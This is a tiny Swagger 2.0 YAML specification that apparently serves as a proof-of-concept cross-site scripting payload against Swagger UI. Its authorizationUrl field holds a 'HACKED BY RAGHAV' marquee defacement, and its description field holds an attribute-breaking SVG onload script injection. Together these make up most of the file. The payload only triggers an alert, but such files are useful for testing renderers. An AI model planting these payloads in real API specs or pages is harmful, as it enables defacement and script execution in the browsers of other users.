swagger: '2.0'
info:
    title: Example Title
    authorizationUrl: <marquee><h1>HACKED BY RAGHAV</h1></marquee>
    version: production
    description: Please Authorize!'"/><svg/onload=alert(1)><!--
paths:
  /:
    get:
      responses:
        200:
          description: Successful response
